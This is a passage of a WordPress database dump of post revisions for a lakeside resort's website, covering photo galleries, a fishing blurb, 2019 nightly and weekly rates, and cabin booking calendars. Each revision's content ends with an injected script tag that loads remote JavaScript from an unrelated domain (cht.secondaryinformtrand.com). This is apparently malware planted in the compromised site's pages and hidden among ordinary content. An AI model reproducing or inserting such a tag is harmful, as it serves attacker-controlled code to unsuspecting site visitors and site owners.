http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2605-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2605-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2605.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3611-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3611-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3611-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3611-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3611.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2019/06/62208139_2851471431591627_415800096072925184_n.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2019/06/62208139_2851471431591627_415800096072925184_n.jpg 640w, http://ashbyresort.com/wp-content/uploads/2019/06/62208139_2851471431591627_415800096072925184_n-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"592\" height=\"640\" src=\"http://ashbyresort.com/wp-content/uploads/2019/06/IMG_2971.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2019/06/IMG_2971.jpg 592w, http://ashbyresort.com/wp-content/uploads/2019/06/IMG_2971-278x300.jpg 278w\" sizes=\"(max-width: 592px) 100vw, 592px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3810-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3810-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3810-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3810-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3598-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3598-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3598-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3598-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3598.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3565-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3565-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3565-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3565-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3565.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3540-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3540-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3540-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3540-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3540.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"379\" height=\"640\" src=\"http://ashbyresort.com/wp-content/uploads/2019/06/IMG_2933.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2019/06/IMG_2933.jpg 379w, http://ashbyresort.com/wp-content/uploads/2019/06/IMG_2933-178x300.jpg 178w\" sizes=\"(max-width: 379px) 100vw, 379px\" />											\n										<img width=\"200\" height=\"200\" src=\"http://ashbyresort.com/wp-content/uploads/2019/09/67664725_2541790915884778_4081940006199885824_n.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2019/09/67664725_2541790915884778_4081940006199885824_n.jpg 200w, http://ashbyresort.com/wp-content/uploads/2019/09/67664725_2541790915884778_4081940006199885824_n-150x150.jpg 150w\" sizes=\"(max-width: 200px) 100vw, 200px\" />											\n										<img width=\"200\" height=\"200\" src=\"http://ashbyresort.com/wp-content/uploads/2019/09/67354008_2515260805204456_2096376990331305984_n.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2019/09/67354008_2515260805204456_2096376990331305984_n.jpg 200w, http://ashbyresort.com/wp-content/uploads/2019/09/67354008_2515260805204456_2096376990331305984_n-150x150.jpg 150w\" sizes=\"(max-width: 200px) 100vw, 200px\" />											\n										<img width=\"640\" height=\"463\" src=\"http://ashbyresort.com/wp-content/uploads/2019/06/IMG_2905.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2019/06/IMG_2905.jpg 640w, http://ashbyresort.com/wp-content/uploads/2019/06/IMG_2905-300x217.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n		<p>Pelican lake has wonderful walleye, bass, northern, crappie and sunfish.</p><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Fishing','','inherit','closed','closed','','81-revision-v1','','','2019-09-10 10:44:50','2019-09-10 15:44:50','',81,'http://ashbyresort.com/81-revision-v1/',0,'revision','',0),(932,3,'2019-09-10 11:20:00','2019-09-10 16:20:00','[[\"2019\",\"Bedrooms\",\"Weekday Nightly\",\"Weekend Holiday Nightly\",\"Weekly Sept. \\u2013 May\",\"Weekly June \\u2013 Aug.\",\"Maximum Capacity\"],[\"Sleepers Motel\\nSept 20- April 30\",\"1\",\"$80\",\"$80\",\"$450\",\"\",\"4\"],[\"Kitchenettes Motel\\nSept 20- April 30\",\"1\",\"$100\",\"$100\",\"$600\",\"\",\"4\"],[\"Sleepers Motel\",\"1\",\"$90.\",\"$100.00\",\"$450.00\",\"$550.00\",\"4\\n\"],[\"Kitchenettes Motel\",\"1\",\"$110.00\",\"$130.00\",\"$600.00\",\"$700.00\",\"4\"],[\"Suite 9\",\"2\",\"$200.00\",\"$230.00\",\"$1000.00\",\"$1,175.00\",\"4\"],[\"Cabins (#10 #11 #12)\",\"2\",\"$200.00\",\"$230.00\",\"$1000.00\",\"$1,175.00\",\"8\"],[\"Cabins (#13 #14)\",\"2\",\"$220.00\",\"$250.00\",\"$1,100.00\",\"$1,275.00\",\"8\"],[\"Camping non-electric\",\"1 per site\",\"$35.00\",\"$35.00\",\"$180.00\",\"$180.00\",\"\"],[\"Camping with electric\",\"1\\u00a0 per site\\n\",\"$45.00\",\"$45.00\",\"$250.00\",\"$250.00\",\"\"],[\"Drive Thru sites, elec, water and sewer\",\"1 per site\",\"$60.00\",\"$60.00\",\"$300.00\",\"$300.00\",\"\"],[\"Pets (two pets per campsite)\",\"\",\"$10.00/ Pet\",\"$10.00/ Pet\",\"$50.00/ Pet\",\"$50.00/ Pet\",\"\"],[\"Pet in Cabins or Motel rooms\",\"\",\"$25.00/ Pet\",\"$25.00/ Pet\",\"$125.00/ Pet\",\"$125.00/ Pet\",\"\"],[\"Additional People Camping (Each)\",\"\",\"$5.00\",\"$5.00\",\"$25.00\\n\",\"$25.00\\n\",\"\"],[\"Additional People in Motel and Cabins (Each)\",\"\",\"$25.00\",\"$25.00\",\"$125.00\\n\",\"$125.00\\n\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','2019 Rates','Call us at 218-747-2959 for reservations  \nNO checkins after 10:00 PM !!\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  Balance is due upon arrival.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nAll Guests must check in upon arrival. \nWireless Internet Available','inherit','closed','closed','','679-revision-v1','','','2019-09-10 11:20:00','2019-09-10 16:20:00','',679,'http://ashbyresort.com/679-revision-v1/',0,'revision','',0),(933,3,'2019-09-10 11:31:40','2019-09-10 16:31:40','[[\"\",\"9/7-9/13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/14-9/20\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/21-9/27\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/28-10/4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"10/5-10/11\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\"],[\"KITCHEN 1\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"1\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"1\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"SLEEPER 2\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"2\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 3\",\"3\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"3\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"3\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 4\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 5\",\"5\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"5\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 6\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"6\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"6\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 7\",\"7\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"7\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"7\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"VILLA 9\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"9\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 10\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"10\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"10\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"10\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 11\",\"11\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"11\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"11\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"11\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 12\",\"12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"12\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"12\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"12\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 13\",\"13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"13\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"13\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"13\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"13\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 14\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"14\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-09-10 11:31:40','2019-09-10 16:31:40','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(934,3,'2019-11-12 05:13:57','2019-11-12 11:13:57','[[\"\",\"11/9-11/15\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"11/16-11/22\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"11/23-11/29\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"11/30-12/6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12/7-12/13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\"],[\"KITCHEN 1\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"SLEEPER 2\",\"2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"KITCHEN 3\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 4\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 5\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 6\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 7\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"VILLA 9\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 10\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 11\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 12\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 13\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 14\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-11-12 05:13:57','2019-11-12 11:13:57','',835,'https://ashbyresort.com/835-revision-v1/',0,'revision','',0),(935,3,'2019-12-07 05:35:13','2019-12-07 11:35:13','[[\"\",\"12/7-12/13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12/14-12/20\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12/21-12/27\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12/28-1/3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12/7-12/13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\"],[\"KITCHEN 1\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"SLEEPER 2\",\"2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"KITCHEN 3\",\"3\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 4\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 5\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 6\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 7\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"VILLA 9\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 10\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 11\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 12\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 13\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 14\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-12-07 05:35:13','2019-12-07 11:35:13','',835,'https://ashbyresort.com/835-revision-v1/',0,'revision','',0),(936,3,'2019-12-31 10:38:11','2019-12-31 16:38:11','[[\"\",\"9-May\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"16-May\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"23-May\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"30-May\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"13-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"20-Jun\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\"],[\"K-1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"K-3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"S-4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\